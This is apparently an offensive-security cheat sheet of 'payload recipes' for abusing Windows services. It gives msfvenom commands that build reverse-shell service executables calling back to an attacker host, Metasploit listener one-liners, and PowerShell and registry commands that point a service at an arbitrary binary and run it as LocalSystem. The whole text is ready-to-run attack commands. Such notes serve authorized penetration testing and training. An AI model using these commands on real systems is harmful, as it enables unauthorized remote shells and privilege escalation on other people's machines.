Payload recipes
# Create service payload using MSFvenom (windows/x64/meterpreter/reverse_tcp)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe-service -o evil-service.exe
# Metasploit listenter (windows/x64/meterpreter/reverse_tcp)
msfconsole -q -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST x.x.x.x;set LPORT 4444;run"
# Create service payload using MSFvenom (windows/x64/shell_reverse_tcp)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe-service -o evil-service.exe
#Metasploit listenter (windows/x64/shell_reverse_tcp)
msfconsole -q -x "use exploit/multi/handler;set payload windows/x64/shell_reverse_tcp;set LHOST x.x.x.x;set LPORT 4444;run"These commands must be ran with elevated privileges. PowerShell spawned from PsExec is perfect.
# Interactive create new service:
New-Service -Name (Read-Host "Service name") -DisplayName (Read-Host "Displayname") -Description (Read-Host "Description") -BinaryPathName (Read-Host "Binpath") -StartupType Automatic# Start the service
Start-Service -Name (Read-Host "Service name")# Stop the service
Stop-Service -Name (Read-Host "Service name")# Get BinPath of service
Get-WmiObject -Class Win32_Service -Filter "Name='$(Read-Host "Service name")'" | Select-Object PathName# Get all info of a service
Get-WmiObject -Class Win32_Service -Filter "Name='$(Read-Host "Service name")'" | Select-Object *These could possible be ran with lower privileges such as 'Backup Operator'
# Set Binpath of service by modifying registry
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$(Read-Host "Service name")" -Name "ImagePath" -Value (Read-Host "Binpath")# Set service start type to local system by modifying registry
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$(Read-Host "Service name")" -Name "ObjectName" -Value "LocalSystem"